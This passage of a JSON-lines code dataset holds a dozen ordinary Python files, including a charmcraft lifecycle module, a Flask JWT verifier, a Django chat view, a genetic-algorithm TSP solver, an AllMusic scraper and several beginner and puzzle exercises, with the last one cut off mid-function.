sol1=(len(grid)-1)*2+(len(grid[0])-1)*2 # calculate perimeter trees\n sol1+=find_visible(grid,grid_rot) # count visible trees inside perimeter\n\n# Part two\n sol2 = find_scenic_score(grid)\n \n print(\"Solution 1: %d trees\" % sol1)\n print(\"Solution 2: %d \" % sol2)\n print(\"Finished in %.5s seconds\" % (time.time() - start_time))","repo_name":"J0RENV/AOC2022","sub_path":"Challenge_8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9828373284","text":"import os\nimport pathlib\nimport shlex\nfrom typing import Any, Dict, List\n\nfrom craft_cli import CraftError, emit\nfrom craft_parts import LifecycleManager, PartsError, Step\nfrom xdg import BaseDirectory # type: ignore[import]\n\nfrom charmcraft import charm_builder, instrum\n\n\nclass PartsLifecycle:\n \"\"\"Create and manage the parts lifecycle.\n\n :param all_parts: A dictionary containing the parts defined in the project.\n :param work_dir: The working directory for parts processing.\n :param project_dir: The directory containing the charm project.\n :param ignore_local_sources: A list of local source patterns to be ignored.\n :param name: Charm name as defined in ``metadata.yaml``.\n \"\"\"\n\n def __init__(\n self,\n all_parts: Dict[str, Any],\n *,\n work_dir: pathlib.Path,\n project_dir: pathlib.Path,\n project_name: str,\n ignore_local_sources: List[str],\n ):\n self._all_parts = all_parts.copy()\n self._project_dir = project_dir\n\n # set the cache dir for parts package management\n cache_dir = BaseDirectory.save_cache_path(\"charmcraft\")\n\n try:\n self._lcm = LifecycleManager(\n {\"parts\": all_parts},\n application_name=\"charmcraft\",\n work_dir=work_dir,\n cache_dir=cache_dir,\n ignore_local_sources=ignore_local_sources,\n project_name=project_name,\n )\n except PartsError as err:\n raise CraftError(f\"Error bootstrapping lifecycle manager: {err}\") from err\n\n @property\n def prime_dir(self) -> pathlib.Path:\n \"\"\"Return the parts prime directory path.\"\"\"\n return self._lcm.project_info.prime_dir\n\n def run(self, target_step: Step) -> None:\n \"\"\"Run the parts lifecycle.\n\n :param target_step: The final step to execute.\n\n :raises CraftError: On error during lifecycle ops.\n :raises RuntimeError: On unexpected error.\n \"\"\"\n previous_dir = os.getcwd()\n try:\n os.chdir(self._project_dir)\n\n # invalidate build if packing a charm and entrypoint changed\n if \"charm\" in self._all_parts:\n charm_part = self._all_parts[\"charm\"]\n if charm_part.get(\"plugin\") == \"charm\":\n entrypoint = os.path.normpath(charm_part[\"charm-entrypoint\"])\n dis_entrypoint = os.path.normpath(_get_dispatch_entrypoint(self.prime_dir))\n if entrypoint != dis_entrypoint:\n self._lcm.clean(Step.BUILD, part_names=[\"charm\"])\n self._lcm.reload_state()\n\n emit.debug(f\"Executing parts lifecycle in {str(self._project_dir)!r}\")\n actions = self._lcm.plan(target_step)\n emit.debug(f\"Parts actions: {actions}\")\n with instrum.Timer(\"Running action executor\") as executor_timer:\n with self._lcm.action_executor() as aex:\n executor_timer.mark(\"Context enter\")\n for act in actions:\n emit.progress(f\"Running step {act.step.name} for part {act.part_name!r}\")\n with instrum.Timer(\"Running step\", step=act.step.name, part=act.part_name): # type: ignore[arg-type]\n with emit.open_stream(\"Execute action\") as stream:\n aex.execute([act], stdout=stream, stderr=stream)\n executor_timer.mark(\"Context exit\")\n\n except RuntimeError as err:\n raise RuntimeError(f\"Parts processing internal error: {err}\") from err\n except OSError as err:\n msg = err.strerror\n if err.filename:\n msg = f\"{err.filename}: {msg}\"\n raise CraftError(f\"Parts processing error: {msg}\") from err\n except Exception as err:\n raise CraftError(f\"Parts processing error: {err}\") from err\n finally:\n os.chdir(previous_dir)\n\n\ndef _get_dispatch_entrypoint(dirname: pathlib.Path) -> str:\n \"\"\"Read the entrypoint from the dispatch file.\"\"\"\n dispatch = dirname / charm_builder.DISPATCH_FILENAME\n entrypoint_str = \"\"\n try:\n with dispatch.open(\"rt\", encoding=\"utf8\") as fh:\n last_line = None\n for line in fh:\n if line.strip():\n last_line = line\n if last_line:\n entrypoint_str = shlex.split(last_line)[-1]\n except (OSError, UnicodeDecodeError):\n return \"\"\n\n return entrypoint_str\n","repo_name":"canonical/charmcraft","sub_path":"charmcraft/parts/lifecycle.py","file_name":"lifecycle.py","file_ext":"py","file_size_in_byte":4577,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"38"} +{"seq_id":"41001564562","text":"from flask import request\nfrom six.moves.urllib.request import urlopen\nfrom jose import jwt\nimport json\n\n\nclass AuthError(Exception):\n def __init__(self, error, status_code):\n self.error = error\n self.status_code = status_code\n\n\n# This code is borrowed from the python sample in module 7\n# Verify the JWT in the request's Authorization header\ndef verify_jwt(req: request, domain: str, client_id: str) -> dict:\n if \"Authorization\" in req.headers:\n auth_header = req.headers[\"Authorization\"].split()\n token = auth_header[1]\n else:\n raise AuthError(\n {\n \"code\": \"no auth.py header\",\n \"description\": \"Authorization header is missing\",\n },\n 401,\n )\n\n jsonurl = urlopen(f\"https://{domain}/.well-known/jwks.json\")\n jwks = json.loads(jsonurl.read())\n try:\n unverified_header = jwt.get_unverified_header(token)\n except jwt.JWTError:\n raise AuthError(\n {\n \"code\": \"invalid_header\",\n \"description\": \"Invalid header. \"\n \"Use an RS256 signed JWT Access Token\",\n },\n 401,\n )\n if unverified_header[\"alg\"] == \"HS256\":\n raise AuthError(\n {\n \"code\": \"invalid_header\",\n \"description\": \"Invalid header. \"\n \"Use an RS256 signed JWT Access Token\",\n },\n 401,\n )\n rsa_key = {}\n for key in jwks[\"keys\"]:\n if key[\"kid\"] == unverified_header[\"kid\"]:\n rsa_key = {\n \"kty\": key[\"kty\"],\n \"kid\": key[\"kid\"],\n \"use\": key[\"use\"],\n \"n\": key[\"n\"],\n \"e\": key[\"e\"],\n }\n if rsa_key:\n try:\n payload = jwt.decode(\n token,\n rsa_key,\n algorithms=[\"RS256\"],\n audience=client_id,\n issuer=f\"https://{domain}/\",\n )\n except jwt.ExpiredSignatureError:\n raise AuthError(\n {\"code\": \"token_expired\", \"description\": \"token is expired\"}, 401\n )\n except jwt.JWTClaimsError:\n raise AuthError(\n {\n \"code\": \"invalid_claims\",\n \"description\": \"incorrect claims,\"\n \" please check the audience and issuer\",\n },\n 401,\n )\n except Exception:\n raise AuthError(\n {\n \"code\": \"invalid_header\",\n \"description\": \"Unable to parse authentication\" \" token.\",\n },\n 401,\n )\n\n return payload\n else:\n raise AuthError(\n {\"code\": \"no_rsa_key\", \"description\": \"No RSA key in JWKS\"}, 401\n )\n","repo_name":"ljensen505/cloud-portfolio","sub_path":"helpers/verify_jwt.py","file_name":"verify_jwt.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"72199414829","text":"import json\nfrom pathlib import Path\nfrom ast import literal_eval\nfrom json.decoder import JSONDecodeError\n\nfolder = Path.cwd().parent / 'dataset'\nfolder.mkdir(exist_ok=True)\nfiles = folder.glob(\"*.json\")\n\nbusiness = str(next(files))\ncheckin = str(next(files))\nreview = str(next(files))\ntip = str(next(files))\nuser = str(next(files))\n\nout_folder = Path.cwd().parent / 'dataset' / 'Clean Data'\nout_folder.mkdir(exist_ok=True)\nout_file_business = str(out_folder / 'yelp_output_business.json')\nout_file_checkin = str(out_folder / 'yelp_output_checkin.json')\nout_file_user = str(out_folder / 'yelp_output_user.json')\n\n\ndef fix_json_formatting(input_file: str, output_file: str):\n with open(input_file, 'r', encoding='utf-8') as f:\n # Read the input file as a string\n data_str = f.read()\n\n # Split the string into lines, if multiple objects are present\n data_lines = data_str.strip().split('\\n')\n\n # Parse each line as a separate JSON object\n for line in data_lines:\n try:\n data = json.loads(line)\n except JSONDecodeError:\n print(f\"Error decoding JSON object in line: {line}\")\n continue\n\n attributes = data.get('attributes')\n if attributes:\n for key, value in attributes.items():\n if isinstance(value, str) and value.startswith(\"u'\") and value.endswith(\"'\"):\n data['attributes'][key] = value[2:-1]\n # To evaluate and store the value as a JSON object, we use literal_eval\n elif isinstance(value, str) and value.startswith('{') and value.endswith('}'):\n data['attributes'][key] = literal_eval(value)\n elif isinstance(value, str) and value.startswith(\"'\") and value.endswith(\"'\"):\n data['attributes'][key] = value[1:-1]\n\n categories = data.get('categories')\n if categories:\n data['categories'] = data['categories'].replace(r\"\\/\", \", \")\n data['categories'] = categories.split(', ')\n\n # Write the cleaned JSON object to the output file\n with open(output_file, 'a') as c:\n json.dump(data, c)\n c.write('\\n')\n\n\ndef transform_list_len(input_file: str, output_file: str, item: str):\n with open(input_file, 'r', encoding='utf-8') as r:\n data_str = r.read()\n data_lines = data_str.strip().split('\\n')\n\n for line in data_lines:\n try:\n data = json.loads(line)\n except JSONDecodeError:\n print(f\"Error decoding JSON object in line: {line}\")\n continue\n\n dates_list = data[item].split(\", \")\n dates_len = len(dates_list)\n data[item] = dates_len\n\n with open(output_file, 'a') as w:\n json.dump(data, w)\n w.write('\\n')\n\n\nfix_json_formatting(business, out_file_business)\nprint('Transformation of Business well done!')\ntransform_list_len(checkin, out_file_checkin, \"date\")\nprint('Transformation of Checkin well done!')\ntransform_list_len(user, out_file_user, \"friends\")\nprint('Transformation of user well done!')\n\n","repo_name":"AdnenMess/yelp-document-streaming","sub_path":"Client/Transforming.py","file_name":"Transforming.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"13662933228","text":"from django.contrib import messages\nfrom accounts.models import User\nfrom chat.models import Chat\nfrom travellers.models import Traveller\nfrom places.models import Place\n\nfrom operator import itemgetter\nfrom PIL import Image\n\nfrom django.shortcuts import render,redirect\nfrom django.db.models import Q\nfrom django.contrib.auth.decorators import login_required\n\n@login_required\ndef chat(request, email):\n friend_user=User.objects.filter(email=email).first()\n friend_userid=friend_user.id #the one the peson is chatting with\n current_user=request.user #logged in user \n index=0\n user_name_chat=[] \n \n all_chat_list = Chat.objects.filter(Q(sender=current_user) | Q(receiver=current_user)) #every chat of the logged in user\n chat_list = Chat.objects.filter(Q(sender=current_user,receiver=friend_userid) | Q(receiver=current_user,sender=friend_userid)) #user specific chat list\n \n #save message to database\n if request.method == 'POST':\n hello = Chat(sender=request.user, receiver=User.objects.get(id=friend_userid), message_text=request.POST['message'])\n hello.save()\n \n for chat in all_chat_list:\n user = chat.receiver if chat.sender==current_user else chat.sender\n if any(user == x['user'] for x in user_name_chat): \n continue\n else:\n messages= all_chat_list.filter(Q(sender=user) | Q(receiver=user)).last()\n last_message_time=messages.message_time.isoformat()\n is_last_messagebycurrentuser= True if messages.sender==current_user else False\n photo=Traveller.objects.filter(email=user).first().photo_main \n \n user_name_chat.append({\n 'user':user, \n 'messages' : messages, \n 'last_message' : messages.message_text[:40],\n 'is_last_messagebycurrentuser' : is_last_messagebycurrentuser, \n 'user_photo' : photo, \n 'last_message_time' : last_message_time\n }) \n print(messages.message_time.isoformat())\n # print(index)\n # print(user_name_chat[0]['is_last_messagebycurrentuser'])\n # print(user_name_chat[index]['user'])\n # print(user_name_chat[index]['last_message'])\n # print(chat_list)\n \n index+=1\n # sort users in order of message time\n user_name_chat=sorted(user_name_chat, key=itemgetter('last_message_time'), reverse=True)\n \n context={ \n 'chat_details':user_name_chat,\n 'chat_friend':User.objects.get(id=friend_userid) ,\n 'chat_list':chat_list.order_by('message_time'),\n 'traveller_currentuser':Traveller.objects.filter(email=current_user.id).first(),\n 'traveller_chatuser':Traveller.objects.filter(email=friend_user.id).first(),\n 'logged_in_user': Traveller.objects.filter(email=current_user.id).first(),\n }\n \n # print(context['traveller_currentuser'].photo_main)\n print(context['chat_friend'])\n \n\n return render(request, \"chat/chat.html\", context)\n@login_required\ndef chatRedirect(request):\n last_message = Chat.objects.filter(Q(sender=request.user) | Q(receiver=request.user)).last()\n \n try:\n user = last_message.receiver if last_message.sender==request.user else last_message.sender\n print(user.email)\n return redirect(f\"{user.email}\")\n\n except:\n messages.info(request,'You haven\\'t talked with anyone yet.')\n print (request.META)\n return redirect(request.META['HTTP_REFERER'])\n\n\n\n\n# @login_required\n# def course_chat_room(request, course_id):\n# print(course_id)\n# return render(request, 'chat/room.html', {'course_id': course_id})\n ","repo_name":"sagarpaudell/travellum","sub_path":"chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"16928485555","text":"import numpy as np\r\nimport random\r\nimport operator\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef create_new_member(n_city):\r\n pop = set(np.arange(n_city, dtype=int))\r\n route = list(random.sample(pop, n_city))\r\n\r\n return route\r\n\r\n# primeira geração\r\n\r\n\r\ndef create_starting_population(size, n_city):\r\n population = []\r\n\r\n for i in range(0, size):\r\n population.append(create_new_member(n_city))\r\n\r\n return population\r\n\r\n# distancia entre cidade i e cidade j\r\n\r\n\r\ndef distance(i, j):\r\n return np.sqrt((i[0]-j[0])**2 + (i[1]-j[1])**2)\r\n\r\n# fitness individual\r\n\r\n\r\ndef fitness(route, cities):\r\n score = 0\r\n for i in range(1, len(route)):\r\n k = int(route[i-1])\r\n l = int(route[i])\r\n\r\n score = score + distance(cities[k], cities[l])\r\n\r\n return score\r\n\r\n# fitness de toda população\r\n\r\n\r\ndef score_population(population, cities):\r\n scores = []\r\n\r\n for i in population:\r\n scores.append(fitness(i, cities))\r\n\r\n return scores\r\n\r\n\r\ndef crossover(a, b):\r\n child = []\r\n childA = []\r\n childB = []\r\n\r\n geneA = int(random.random() * len(a))\r\n geneB = int(random.random() * len(a))\r\n\r\n start_gene = min(geneA, geneB)\r\n end_gene = max(geneA, geneB)\r\n\r\n # seleciona randomicamente uma parte do primeiro progenitor\r\n for i in range(start_gene, end_gene):\r\n childA.append(a[i])\r\n\r\n # insere genes do segundo progenitor\r\n childB = [item for item in a if item not in childA]\r\n child = childA+childB\r\n\r\n return child\r\n\r\n\r\ndef breed_population(mating_pool):\r\n children = []\r\n for i in range(len(mating_pool)-1):\r\n children.append(crossover(mating_pool[i], mating_pool[i+1]))\r\n return children\r\n\r\n# duas cidades vão mudar de lugar\r\n\r\n\r\ndef mutate(route, probablity):\r\n route = np.array(route)\r\n for swaping_p in range(len(route)):\r\n if (random.random() < probablity):\r\n swapedWith = np.random.randint(0, len(route))\r\n temp1 = route[swaping_p]\r\n temp2 = route[swapedWith]\r\n route[swapedWith] = temp1\r\n route[swaping_p] = temp2\r\n\r\n return route\r\n\r\n\r\ndef selection(popRanked, eliteSize):\r\n selectionResults = []\r\n\r\n # roulette wheel\r\n df = pd.DataFrame(np.array(popRanked), columns=[\"Index\", \"Fitness\"])\r\n df['cum_sum'] = df.Fitness.cumsum()\r\n df['cum_perc'] = 100*df.cum_sum/df.Fitness.sum()\r\n\r\n for i in range(0, eliteSize):\r\n selectionResults.append(popRanked[i][0])\r\n\r\n for i in range(0, len(popRanked) - eliteSize):\r\n pick = 100*random.random()\r\n for i in range(0, len(popRanked)):\r\n if pick <= df.iat[i, 3]:\r\n selectionResults.append(popRanked[i][0])\r\n break\r\n\r\n return selectionResults\r\n\r\n\r\ndef get_all_fitness(population, cities_list):\r\n fitnessResults = {}\r\n for i in range(0, len(population)):\r\n fitnessResults[i] = fitness(population[i], cities_list)\r\n return sorted(fitnessResults.items(), key=operator.itemgetter(1), reverse=False)\r\n\r\n# função mutação para toda a população\r\ndef mutate_population(children, mutation_rate):\r\n new_generation = []\r\n for i in children:\r\n mutated_child = mutate(i, mutation_rate)\r\n new_generation.append(mutated_child)\r\n return new_generation\r\n\r\n\r\ndef mating(population, selectionResults):\r\n mating_pool = []\r\n for i in range(0, len(selectionResults)):\r\n index = selectionResults[i]\r\n mating_pool.append(population[index])\r\n return mating_pool\r\n\r\n\r\ndef next_generation(cities_list, current_population, mutation_rate, elite_size):\r\n # rankeia as rotas da próxima geração\r\n population_rank = get_all_fitness(current_population, cities_list)\r\n\r\n # determina os potenciais progenitores\r\n selection_result = selection(population_rank, elite_size)\r\n\r\n mating_pool = mating(current_population, selection_result)\r\n\r\n # cria nova geração\r\n children = breed_population(mating_pool)\r\n\r\n # aplica mutação nela\r\n next_generation = mutate_population(children, mutation_rate)\r\n\r\n return next_generation\r\n\r\n\r\ndef a_romaria_da_vovo(cities_list, size_population=100, elite_size=20, mutation_rate=0.01, generation=500):\r\n pop = create_starting_population(size_population, len(cities_list))\r\n\r\n print(\"Primeira distância de rota encontrada: \" +\r\n str(get_all_fitness(pop, cities_list)[0][1]))\r\n\r\n for i in range(0, generation):\r\n pop = next_generation(cities_list, pop, mutation_rate, elite_size)\r\n print(\"Nova distância de rota: \" +\r\n str(get_all_fitness(pop, cities_list)[0][1]))\r\n\r\n print(\"Última e melhor distância de rota encontrada: \" +\r\n str(get_all_fitness(pop, cities_list)[0][1]))\r\n\r\n\r\ncities = []\r\n\r\nwith open('data.txt') as f:\r\n f.readline().strip()\r\n for line in f:\r\n line = line.strip()\r\n line = line.split()\r\n line.pop(2)\r\n cities.append((float(line[0]),\r\n float(line[1])))\r\n\r\na_romaria_da_vovo(cities_list=cities)\r\n","repo_name":"marielacordeiro/genetic_algorithm","sub_path":"a_romaria.py","file_name":"a_romaria.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36341134337","text":"import re\nfrom Text import TextFile\n\nconfig = {\n 'base': \"http://www.allmusic.com\",\n 'search': \"/search/artists/%s\",\n 'search_space_char': '-',\n 'artistlink': '(/artist/[^\"]*)\"[^>]*>%s( \\[.*?\\])?',\n 'link': '(/album/[^\"]*)\" class=\"title[^>]*>%s( \\[.*?\\])?'\n}\n\n\ndef matches(text):\n return 'allmusic' in text or 'AllMusic' in text\n\n\nclass AllmusicFile(TextFile):\n\n def __init__(self, text):\n self.log(\"init\")\n tmptext = \"\"\n\n tmptext = self.rating(text, tmptext)\n tmptext = self.review(text, tmptext)\n tmptext = self.genres(text, tmptext)\n tmptext = self.moods(text, tmptext)\n tmptext = self.tracks(text, tmptext)\n\n #v1\n tmptext = re.sub('', '', tmptext)\n tmptext = re.sub('\"AMG', '* ', tmptext)\n tmptext = re.sub('', ' ', tmptext)\n\n tmptext = re.sub('width=\"582\"', '', tmptext)\n tmptext = re.sub('padding-bottom:5px', '', tmptext) # listings\n tmptext = re.sub('padding-bottom:4px', 'padding:3px', tmptext) # review text\n tmptext = re.sub('', '', tmptext)\n tmptext = re.sub('', '', tmptext)\n tmptext = re.sub('', ' ', tmptext)\n\n self.text = '
' + tmptext + '
'\n\n self.css += \"\"\"\n \n \n \n \"\"\"\n\n def rating(self, text, tmptext):\n s = re.search('(\"([0-9\\.]*)', text, re.S)\n if s:\n tmptext += '
Rating
'\n tmptext += s.group(2) + '
'\n else:\n #v2\n # e.g. \"star_rating(7)\"\n s = re.search('', text, re.S)\n if s:\n tmptext += '
Rating
'\n tmptext += s.group(1) + '/10
'\n else:\n #v3\n s = re.search('itemprop=\"rating\">(.*?)', text, re.S)\n if s:\n tmptext += '
rating
'\n tmptext += s.group(1) + '/5
'\n return tmptext\n\n def review(self, text, tmptext):\n s = re.search('(.*?

)', text, re.S) # text\n if s:\n tmptext += s.group(1) + '
'\n else:\n #v2\n s = re.search('

(.*?)

', text, re.S) # text\n if s:\n s2 = re.search('(

.*?

)', text, re.S) # author\n if s2:\n tmptext += s2.group(1) + '
'\n tmptext += s.group(1) + '
'\n else:\n #v3\n s = re.search('
(.*?)
'\n return tmptext\n\n def genres(self, text, tmptext):\n s = re.search('(.*?)', text, re.S)\n if s:\n # tmptext += '
Genre & Styles
'\n tmptext += s.group(1)\n else:\n #v3\n s = re.search('(
genre
.*?)
', text, re.S)\n if s:\n tmptext += s.group(1)\n return tmptext\n\n def moods(self, text, tmptext):\n s = re.search('Moods( Listing|/Themes)-->(.*?)', text, re.S)\n if s:\n # tmptext += '
Moods & Themes
'\n tmptext += s.group(2)\n else:\n #v3\n s = re.search('(

album moods

.*?)
(.*?)', text, re.S)\n if s:\n tmptext += s.group(1)\n else:\n #v3\n s = re.search('(
.*?)
', '', tmptext)\n tmptext = re.sub('', '', tmptext)\n # tmptext = re.sub('width=\"235px\"', '', tmptext)\n # tmptext = re.sub('width=\"237px\"', '', tmptext)\n # tmptext = re.sub('width=\"552px\"', '', tmptext)\n return tmptext\n","repo_name":"camico/AmarokReader","sub_path":"conTEXT/filetypes/Allmusic.py","file_name":"Allmusic.py","file_ext":"py","file_size_in_byte":5597,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28790024420","text":"'''\n Date : 11/11/2020\n Day : Wednessday\n Author : Md. Aminul Islam\n Topic : Problem Solving\n Problem : Sum and Prod\n Problem link : https://www.hackerrank.com/challenges/np-sum-and-prod/problem\n''' \n\nimport numpy as np\n\nn, m = map(int, input().split())\n\narr = np.array([input().split() for _ in range(n)], int)\n\narr_sum = np.sum(arr, axis = 0)\narr_prod = np.prod(arr_sum)\n\nprint(arr_prod)","repo_name":"aminul788/NSL-RAShip-Programm","sub_path":"python-basic/Problem-Solving/Sum_and_Prod.py","file_name":"Sum_and_Prod.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9262663437","text":"import os\nimport numpy as np\nimport pandas as pd\nimport constant\n\nRANDOM_SEED = [12346, 12347, 12348]\nASR = constant.ASR\nTTS = constant.TTS\nDATASET = constant.DATASET\n\nimport sys, getopt\nimport utils\nimport constant\n\ndef printHelp() :\n print('calculate_averaged_result.py -a ')\n print(\"or\")\n print('calculate_averaged_result.py --approach ')\n\ndef main(argv):\n approach = \"\"\n try:\n opts, args = getopt.getopt(argv,\"ha:\",[\"approach=\"])\n except getopt.GetoptError:\n printHelp()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n printHelp()\n sys.exit()\n elif opt in (\"-a\", \"--approach\"):\n approach = arg\n \n if approach != \"\" :\n calculateAveragedResult(approach)\n else :\n print(\"Please specify the output file location\")\n\ndef calculateAveragedResult(approach) :\n\n df = {}\n avg = {}\n\n for tts in TTS:\n\n a = {}\n avg[tts] = {}\n\n for sr in ASR:\n\n b = {}\n\n avg[tts][sr] = {}\n\n for random_seed in RANDOM_SEED:\n\n fpath = \"result/%s/%s-%d/%s/%s/statistic.csv\" % (approach,\n DATASET, random_seed, tts, sr)\n b[random_seed] = pd.read_csv(fpath)\n\n a[sr] = b\n\n df[tts] = a\n\n avg = {}\n for tts in TTS:\n t = {}\n for sr in ASR:\n s = {}\n i = RANDOM_SEED[0]\n first = i\n temp = df[tts][sr][i]\n for i in RANDOM_SEED:\n if i != first:\n temp = temp.add(df[tts][sr][i], fill_value=0)\n t[sr] = temp/len(RANDOM_SEED)\n t[sr] = t[sr].drop(columns=[\"stc\", \"utc\"])\n avg[tts] = t\n\n for tts in TTS:\n for sr in ASR:\n folder = \"result/%s/%s-averaged/%s/%s/\" % (approach, DATASET,tts, sr)\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n fpath = folder + \"statistic.csv\"\n avg[tts][sr].to_csv(fpath, index=False, float_format='%.2f')\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"soarsmu/CrossASR","sub_path":"calculate_averaged_result.py","file_name":"calculate_averaged_result.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"6204776345","text":"# https://leetcode.com/problems/remove-duplicates-from-sorted-array/\nfrom typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n insert_at = 1\n for i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n nums[insert_at] = nums[i]\n insert_at += 1\n\n return insert_at\n","repo_name":"priyakdey/leetcode-solutions","sub_path":"arrays/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33404068595","text":"# Добавить в Employee атрибут класса department = None\n# Унаследовать от Employee класс TechnicalStaff в котором реализовать метод класса change_department, позволяющий\n# менять департамент\n# Добавить в свойство info данные о департаменте\n\n# Добавить в TechnicalStaff статичный метод get_info(employee), получающий данные от работника и если работник из того же\n# департамента - выдавать приветствие.\n\nfrom hw_08_01 import Employee\n\n\nclass TechnicalStaff(Employee):\n department = 'Practical medicine'\n\n @staticmethod\n def get_info(employee):\n if TechnicalStaff.department == employee.department:\n return 'hi'\n return 'You are from different department'\n\n\nfirst_employee = Employee('Yulia', 'Sukach', 24, 'someone')\nassert first_employee.info['fullname'] == 'Yulia Sukach'\nassert first_employee.info['age'] == 24\n\n\nfirst_employee.change_department('Preventive medicine')\n\n\nsecond_employee = TechnicalStaff('Alesia', 'Ivanova', 25, 'dentist')\nassert second_employee.info['fullname'] == 'Alesia Ivanova'\nassert second_employee.info['age'] == 25\n\nassert TechnicalStaff.get_info(first_employee) == 'You are from different department'\n\nsecond_employee.change_department('Preventive medicine')\n\nassert TechnicalStaff.get_info(first_employee) == 'hi'\n\n\n\n\n","repo_name":"YuliaSukach/Python-HW","sub_path":"less_08/hw_08_02_03.py","file_name":"hw_08_02_03.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5333006684","text":"def ispangram(str): \r\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\r\n for char in alphabet: \r\n if char not in str.lower(): \r\n return False\r\n \r\n return True\r\n\r\nstr = input(\"enter a sentence :\\n \")\r\nif ispangram(str):\r\n print('contains all alphabets')\r\nelse:\r\n print('does not contain all alphabets')\r\n","repo_name":"aryanjalla/advanceProgrammingPractices","sub_path":"Week 2/SET 14/ques1.py","file_name":"ques1.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31251027477","text":"\r\nprint(\"hrllo world\")\r\n\r\nfor i,count in enumerate(range(500)):\r\n print(i, count,end = \"\\n============\\n\", sep = \"-\")\r\n \r\n# ================================================================\r\n \r\ntest = print(int((input(\"enter\")))*2)\r\n\r\n# ================================================================\r\n# positive even, positive odd, negative even, negative odd, zero\r\n\r\nx = float(input(\"enter no: \"))\r\n\r\nprint()\r\n\r\nif(x>0):\r\n if(x % 2 ==0):\r\n print(x,\"is positive even\")\r\n else:\r\n print(x,\"is positive odd\")\r\nelif(x<0):\r\n if(x % 2 ==0):\r\n print(x,\"is negative even\")\r\n else:\r\n print(x,\"is negative odd\")\r\nelse:\r\n print(x,\"is zero\")\r\nprint()\r\n\r\n\r\n\r\nif(x > 0) and (x % 2 == 0):\r\n print(x,\"is positive even\")\r\n\r\nelif(x > 0) and (x % 2 == 1):\r\n print(x,\"is positive odd\")\r\n\r\nelif(x < 0) and (x % 2 == 0):\r\n print(x,\"is negative even\")\r\n\r\nelif(x < 0) and (x % 2 == 1):\r\n print(x,\"is negative odd\")\r\n\r\nelse:\r\n print(x,\"is zero\")\r\n# ================================================================\r\n\r\n\r\nprint(\"camparision program\")\r\n\r\na = float(input(\"enter a: \"))\r\nb = float(input(\"enter b: \"))\r\n\r\nif(a > b):\r\n print(a,\"is greater than\",b)\r\nelif(a < b):\r\n print(b,\"is greater than\",b)\r\nelse:\r\n print(f\"{a} amd {b} are the same\")\r\n\r\n\r\na = int(input(\"enter your current salary: \"))\r\nk = int(input(\"enter increment per month: \"))\r\ny = int(input(\"years: \"))\r\n# your salary will be b after 5 yrs\r\n\r\nt = y * 12 # t is duration in months\r\nb = a + k*t\r\n\r\nprint(f\"your salary will be {b} rs after {y} years\")\r\n\r\n# sum of n natural numbers\r\n\r\nn = int(input(\"till which number you want sum ? \"))\r\n\r\n# using for loop\r\nsum=0\r\nfor i in range(1,n+1):\r\n sum += i\r\n\r\n# using formula\r\nsum = n*(n+1)/2\r\n\r\nprint(sum)\r\n\r\n# table of n\r\n\r\nn = int(input(\"you want table of ? \"))\r\n\r\nfor i in range(1,11):\r\n print(i*n,end = \" \")\r\n \r\nr = range(6)\r\nprint(r)\r\nprint(type(r))\r\nprint(list(r))\r\n\r\nprint(list(range(20,10,-2)))\r\nprint(list(range(20,10,2)))\r\n\r\n# smallest divisor of given number n \r\n\r\nn = int(input(\"enter number: \"))\r\n\r\nfor i in range(2,n+1):\r\n if(n % i == 0):\r\n print(f\"{i} is the smallest divisor of {n}\")\r\n break\r\n\r\n\r\ni = 2\r\nwhile (i<=n):\r\n if(n % i == 0):\r\n print(f\"{i} is the smallest divisor of {n}\")\r\n break\r\n i += 1\r\n\r\n\r\n# print numbers in the given list which are not divisible by 5\r\n\r\n\r\nl = [10, 16, 17, 18, 20, 22, 35]\r\n\r\n\r\nfor x in l:\r\n if( x % 5 == 0):\r\n continue\r\n print(x,end = \" \")\r\n\r\n\r\n# print tables of numbers from 1 to n\r\n\r\nn = int(input(\"enter number : \"))\r\n\r\nfor i in range(1,n+1):\r\n print(i,\": \", end = \" \")\r\n for j in range(1,11):\r\n print(i*j, end = \" \")\r\n print()\r\n\r\ndef f(): pass\r\nprint(type(f()))\r\n\r\n\r\nn = int(input(\"enter number : \")) \r\n\r\nfor i in range(n):\r\n if i == 0:\r\n print(\"*\")\r\n elif i == n-1:\r\n print(\"*\"*n)\r\n else:\r\n print(\"*\",\" \"*(i-2),\"*\")\r\n \r\ndef fib(n):\r\n if (n == 1) or (n == 2):\r\n return 1\r\n res = fib(n-1) + fib(n-2)\r\n return 